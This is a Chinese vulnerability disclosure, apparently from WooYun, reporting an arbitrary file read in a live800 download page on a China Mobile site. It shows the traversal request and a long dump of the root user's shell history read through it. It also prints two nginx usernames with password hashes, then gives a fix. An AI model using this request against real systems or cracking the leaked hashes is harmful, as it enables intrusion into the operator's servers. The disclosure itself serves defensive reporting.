
漏洞标题: 中国移动某站任意文件读取

漏洞详情

披露状态:

2016-04-21: 细节已通知厂商并且等待厂商处理中
2016-04-25: 厂商已经确认,细节仅向厂商公开
2016-05-05: 细节向核心白帽子及相关领域专家公开
2016-05-15: 细节向普通白帽子公开
2016-05-25: 细节向实习白帽子公开
2016-06-09: 细节向公众公开

简要描述:

中国移动某站任意文件读取

详细说明:

该 Web 应用以 root 权限运行,因此可以读取 root 用户的 shell 历史命令(/root/.bash_history),读取内容如下:

http://**.**.**.**/live800/downlog.jsp?path=/&fileName=/root/.bash_history

cd

cd

ls

cd /

find ./ -name 'nginx*'

cd ./usr/local/nginx

ls

cd sbin

ls

./nginx -v

ps -ef|grep nginx

cd ..

ls

cd conf

ls

cat nginx.conf

vi nginx.conf

ls

cd ..

ls

cd sbin

ls

./nginx

ifconfig -a

ls

cd ..

ls

cd conf

ls

vi nginx.conf

ls

ps -ef|grep nginx

cd ..

ls

cd bin

cd sbin

ls

./nginx -s reload

ps -ef|grep nginx

ps -ef|grep nginx

./nginx -s stop

ps -ef|grep nginx

./nginx

ps -ef|grep nginx

ifconfig -a

ls

export TMOUT=0

ls

cd /

find ./ -name 'nginx'

cd usr

cd local

cd nginx

ls

cd conf

ls -ltr |wc -l

ls

ls -ltr

cat nginx.conf.default

ls

pwd

ifconfig -a

cd ..

ls

cd html

ls

cd ..

ls

pwd

cd html

ls

cd ..

ls

find ./ -name 'emapdomains*'

cd client_body_temp

ls

cd ..

ls

cd fastcgi_temp

ls

cd ..

ls

cd proxy_temp

ls

cat 1

cd 1

ls

file 00

cd 00

ls

cd ..

ls

cd ..

ls

cd ..

ls

cd scgi_temp

ls

cd ..

ls

cd uwsgi_temp

ls

cd ..

ls

cd on

ls

cd conf

ls

ls -ltr

cat mime.types

ls -ltr|wc -l

ls -ltr

cd

cd etc

cd /etc

ls

cat hosts

cat resolv.conf

cd /usr/local

cd nginx

ls

cd conf

ls

cat nginx.conf

cat upstream.conf

cat nginx.conf

ls

more proxy.conf

ls -ltr

cat proxy.conf

ls -ltr

cat upstream.conf

cd

ls

cd /

find ./ -name '*emapdomains*'

ls

cd /usr/local

ls

cd nginx

ls

cd conf

ls

grep emapdomains *

ls

cd ..

ls

cd logs

ls

pwd

cd ..

ls

cd conf

ls

ls

pwd

ifconfig -a

ls

cd ..

ls

tar cvf ../nginx_conf_byld_20160113.tar conf

ls

cd ..

ls

ls

export TMOUT=0

ls

ps -ef|grep nginx

cd /

find ./ -name

find ./ -name 'nginx*'

pwd

find ./ -name '**.**.**.**'

cd /usr/local

cd nginx

ls

cd conf

ls

cat nginx-conf

ifconfig -a

ls -ltr

cd key

ls

cd ..

ls

cat ngx_passwd

pwd

cd /usr

ls

cd local

ls

cd bushu

cd nginx

ls

cd

cd /

ls

find ./ -name 'configure'

more ./home/Nginx/pcre-8.35/configure

!

ls

ls

ls

cd

ls

cd ..

ls

cd /usr

ls

cd local

ls

cd sbin

ls

cd ..

ls

cd nginx

ls

cd conf

ls

cd ..

ls

cd logs

ls

ls -ltr

cd data

ls

cat *

cd

ls

ls

cd /usr

cd local

ls

cd nginx

ls

cd conf

ls

cat upstaream.conf

more upstream.conf

ls

more nginx.conf

ls

more upstream.conf

cd ..

ls

cd sbin

ls

./nginx

ps -ef|grep nginx

export TMOUT=0

cd /usr/local/nginx

cd /etc/init.d

ls

cd ..

vi hosts

cd /usr/local/nginx

ls

cd conf/

ls

cat upstream.conf

cd /etc/init.x

cd /etc/init.d

vi nginx

ps -ef | grep ngixn

ps -ef | grep nginx

cd /usr/local

ls

cd nginx

ls

cd conf

ls

ls -ltr

more nginx.conf

vi nginx.conf

ifconfig

exit

cd /usr/local

ls

cd nginx

ls

pwd

cd html

ls

ls -ltr

cd ../conf

ls

vi nginx.conf

ifconfig

cd /usr/local

ls

cd nginx

ls

ls -ltr

cd conf

ls

vi nginx.conf

ls

cd /usr

cd local

ls

cd nginx

ls

ps -ef|grep nginx

cd logs

ls -ltr

tail -f access-bassapp.log

ls -ltr

grep mbomc access-bassapp.log

grep mbomc access.log

cd ..

ls

cd conf

ls

vi nginx.conf

;s

ls

cd /usr

cd local

ls

cd nginx

ls

cd logs

ls -ltr

tail -f access.log

ls -ltr

tail -10000f access-mbomc.log

cd /usr

cd local

cd nginx

ls

cd sbin

ls

./nginx -s reload

ps -ef|grep nginx

cd /

find ./ -name 'Squid'

find ./ -name Squid

find ./ -name squid

ps -ef|grep squid

export TMOUT=0

ls

cd /usr

ls

cd local

ls

cd nginx

ls

cd conf

ls

vi nginx.conf

vi nginx.conf

ls

cd ..

ls

ls

export TMOUT=0

ls

cd conf

ls

ls -ltr

exit

ls

ls -ltr

ls

cd /usr

ls

cd local

ls

cd nginx

ls

cd conf

ls

vi nginx.conf

ls

cd ../sbin

ls

./nginx -s stop

vi /usr/local/nginx/conf/nginx.conf

ps -ef|grep nginx

exit

ls

export TMOUT=0

ls

cd /usr

ls

cd local

ls

cd nginx

cd conf

ls

vi upstream.conf

pwd

ifconfig -a

pwd

cd ../sbin

ls

./nginx -s stop

ps -ef|grep nginx

ls

cd ..

ls

cd conf

ls

vi upstream.conf

cd ../sbin

ls

./nginx -s stop

cd ../conf

ls

vi upstream.conf

cd ../sbin

ls

./nginx -s stop

ps -ef|grep nginx

pwd

/usr/local/nginx/sbin/nginx -c /usr/local/nginx/conf/nginx.conf

ps -ef|grep nginx

exit

ls

cd /usr/local

cd nginx

cd conf

vi nginx.conf

cd ../sbin

./nginx -s reload

ps -ef|grep nginx

cd /usr/local/nginx

cd conf/

vi nginx.conf

vi nginx.conf

cd ../sbin/

ls

./nginx -s reload

vi ../conf/nginx.conf

./nginx -s reload

cd ../conf/

ls

vi upstream.conf

vi ../conf/nginx.conf

cd ../sbin/

./nginx -s reload

exit

ipconfig -a

ipfongi

ipconfig

ifconfig

uname -a

top

ifconfig

ls

uname -a

ps

ssh root@**.**.**.**

ls -ltr

ls -ltr /usr/local/nginx/sbin/nginx*

/usr/local/nginx/sbin/nginx -c /usr/local/nginx/conf/nginx.conf

ps -ef|grep nginx.conf

ps -ef|grep nginx

cd

ls

cd ..

ls

cd /home

ls

cd live800

ls

cat startLive800Server.sh

./startLive800Server.sh

ps -ef|grep tomcat

ifconfig

ifconfig |more

netstat -rn

ping **.**.**.**

ssh **.**.**.**

who

ls

cd /

find ./ -name squid

cd ./etc/squid

ls

pwd

cd ./usr/sbin/

cd /

cd ./usr/sbin/

ls

./usr/sbin/squid -s

cd /

/usr/sbin/squid -s

ps -ef|grep squid

ps -ef|grep squid

ps -ef|grep squid

ps -ef|grep squid

ps -ef|grep squid

ps -ef|grep squid

ps -ef|grep squid

ps -ef|grep squid

ps -ef|grep squid

ps -ef|grep squid

ps -ef|grep squid

exit

cd /

find ./ -name 'squid'

/usr/sbin/squid -s

ps -ef|grep squid

ls

ps -ef|grep nginx

cd /usr/local/nginx/conf/

ls

more nginx.conf

ls

more nginx.conf

exit

cd /usr/local/nginx

ls

cd conf/

vi nginx.conf

cd ../sbin

./nginx -s reload

cd ..logs

cd ../logs

ls

tail -f access.log

cd ..

cd conf/

ls

vi upstream.conf

cd ../sbin/

./nginx -s reload

exit

ls

ls

cd

ls

ps -ef|grep nginx

cd /usr/local/nginx/conf/

ls

more nginx.conf

ls

cd

ls

ls

ps -ef|grep nginx

/usr/local/nginx/sbin/nginx -s reload

ps -ef|grep nginx

exit

ls

ps -ef|grep nginx

cd /usr/local/nginx/conf/

ls

cd ..

ls

cd logs

ls

ls -ltr

tail -f access.log

ping **.**.**.**

tail -f access-mbomc.log

ping **.**.**.**

ping **.**.**.**

ls

export TMOUT=0

ls

cd

ls

ps -ef|grep nginx

cd /usr/local/nginx/conf/

ls

ls -ltr

cd ..

ls

cd logs

ls

ls -ltr

tail -1000f access-mbomc.log

LS

ls

ls -ltr

tail -f access-mbomc.log

ls

ls -ltr

tail -f access-mbomc.log

ls -ltr

ipconfig -a

ifconfig -a

ssh root@**.**.**.**

ssh root@**.**.**.**

cd

ls

cd /usr/local/nginx

ls

cd conf

ls

more nginx.conf

ls

ifconfig -a

uname -a

ls

pwd

cd /home

ls

cd live800

ls

cd working

ls

cd tomcat

ls

ls

cd /

find ./ -name 'live800'

cd ./home/live800

ls

cd ./home/live800/working/tomcat/live800

ls

cd working

ls

cd tomcat

ls

cd ..

ls

cd ..

ls

more startLive800Server.sh

cd ../tomcat/

ls

cd working

ls

cd tomcat

ls

ls -ltr

cd webapps

ls

cd live800

ls

pwd

cd /home/live800/working/tomcat/webapps/live800

cd live800

]

ifconfig -a

uname

cd /home

ls

cd /live800

cd live800

ls

startLive800Server.sh

sh startLive800Server.sh

ps -ef|grep live800

ps -ef|grep nginx

cd /usr/local

ls

ls

cd /usr/local

ls

cd gninx

cd nginx

ls

cd sbin

ls

pwd

export TMOUT=0

cd ..

ls

cd conf

ls

pwd

cd

/usr/local/nginx/sbin/nginx -c /usr/local/nginx/conf/nginx.conf

ps -ef|grep nginx

ls

cd /home

cd live800

ls

ls -ltr

cd working

ls

ftp **.**.**.**

cd /home

cd live800

ls

cd /work

cd /working

ls

cd working

ls

cd tomcat

ls

cd live800

ls

cd chatClient

ls

cd chinamobile

ls

cd scripts

ls -F

cd chatbox.js

ls

ls -F

ls -l

cd

ls

cd /home

ls

cd live800

ls

cd working

ls

cd tomcat

ls

cd tomcat

ls

cd ..

ls

cd tomcat

ls

cd webapps

ls

ls -ltr

cd live800

ls

ls -ltr zxkf_index.jsp

ls -ltr *index.jsp*

more index.jsp

more showAccount.jsp

more showAccount.jsp

ls -ltr chatbox.jsp

ls

cd chatClient

ls

more chatbox.htm

ls

ps -ef|grep nginx

cd /usr/local/nginx/conf/

more nginx.conf

ls

ls -ltr

ps -ef|grep nginx

cd /usr/local/nginx/conf/

ls

vi nginx.conf

cd ..

ls

cd sbin

ls

./nginx -s reload

ps -ef|grep nginx

exit

ps -ef | grep ngix

ps -ef | grep ng

ps -ef|grep nginx

cat /usr/local/nginx/conf/nginx.conf

env

ls

find . -name | grep 'index2'

find . -name *.* | grep 'index2'

find . -name 'index2'

find . -name 'index2'pwd

cd ..

ls

find . -name 'index2'

find . -name 'index2.jsp'

cat ./sys/devices/system/cpu/cpu15/cache/index2

cd ./sys/devices/system/cpu/cpu15/cache/index2

ls

cd ..

ls

cd

cd ..

ls

find . -name 'index2.jsp'

cd /home

cd /live800

ls

cd live800

ls

cd working

ls -l

cd tomcat

ls -l

cd webapps

ls

cd live800

ls -l

ls

ls

ls

cd /home

ls

cd live800

ls

cd working

ls

ps -ef|grep nginx

cd /usr/local/nginx/sbin/

./nginx -s reload

export TMOUT=0

./nginx -s reload

ls

cd ..

ls

cd conf

ls

vi nginx.conf

cd ..

ls

cd sbin

./nginx -s reload

cd ..

cd conf

ls

vi nginx.conf

ls

cd /dev

ls

cd shm

ls

cdls

cd

ls

ps -ef|grep nginx

cd /usr/local/nginx/conf/

ls

vi nginx.conf

vi proxy.conf

ls

cd cache

cd /cache

ls

cd proxy_temp_path

ls

ls -ltr

pwd

ls -ltr

rm *

ls

cd ..

ls

cd proxy_cache_path

ls

du -sm *

cd 0

ls

cd 00

ls

ifconfig

exit

ls

ls

ps -ef|grep nginx

cd /usr/local/nginx/sbin/

ls

./nginx -s reload

ls

ps -ef|grep nginx

pwd

cd ..

ls

cd client_body_temp

ls

cd ..

ls

cd fastcgi_temp

ls

cd ..

ls

cd html

ls

cd images

ls

cd ..

ls

cd ..

ls

cd on

cd proxy_temp

ls

file 1

cd 1

ls

file *

cd 00

ls

cd ..

ls

cd ..

ls

cd ..

ls

cd scgi_temp

ls

cd ..

ls

cd uwsgi_temp

ls

cd

export TMOUT=0

ssh **.**.**.**

ls

ps -ef | grep nginx

cat /usr/local/nginx/conf/nginx.conf

ls

pwd

ls -A

cd /home

ls

cd /live800

find ./ 'live800'

e ff

ls

sd ..

cd ..

pwd

cd /SDSSO/WebSSO/zxkf/zxkf_index.jsp

find ./'zxkf_index.jsp'

exit

ls

cd /home/live800/working/tomcat/webapps/live800

ls

cd /home/live800/working/tomcat/webapps/live800

ls

find .-name zxkf_index.jsp

cd ..

ls

cd ..

cd ..

ls

pwd

cd ..

cd ..

ls

pwd

cd .

ls

cd ..

find .-name zxkf_index.jsp

cd /home/live800/working/tomcat

ls

cd /restartTomcat.sh

exit

ls

pwd

/home/live800/working/

cd /home

ls

cd /live800

/home/live800/working/tomcat/webapps/live800

cd /home/live800/working/tomcat/webapps/live800

ps -ef|grep live800

ls

cd /home/live800

ls

cd /working

cd /home/live800/working/tomcat/webapps/live800

ps -ef|grep "live800"

ls

pwd

ps -ef|grep live800

ls

pwd

ls -f

find -name/ live800

find

ls

pwd

cd /home

ls

cd /weblogic

pwd

ps -ef| grep live800

ls -A

ls -a

ls

cd /home/live800/working/tomcat/restartTomcat.sh

cd /home/live800/working/tomcat/

ls

ls -a

pwd

find /-name live800

ls

cd /live800

find /-name "zxkf_index.jsp"

pwd

cd..

cd ..

cd

pwd

history 20

history 50

exit

ls

history 50

ls

pwd

ls -A

cd /SDSSO/WebSSO/zxkf/zxkf_index.jsp

cd /SDSSO

ls

ls

ls -a

此外还可以读取到 nginx 的口令文件:http://**.**.**.**/live800/downlog.jsp?path=/&fileName=/usr/local/nginx/conf/ngx_passwd

zhangyong:2RsUTTsvOmOdA

zengqh:DunTiVFkBxz7A

应该是 nginx 的登录口令(ngx_passwd 中保存的是口令哈希,而非明文)

漏洞证明:

修复方案:

升级存在漏洞的 live800 组件,并对 downlog.jsp 的 path/fileName 参数做路径校验,禁止读取下载目录之外的文件;同时避免以 root 权限运行该 Web 服务。

版权声明:转载请注明来源 小川@乌云



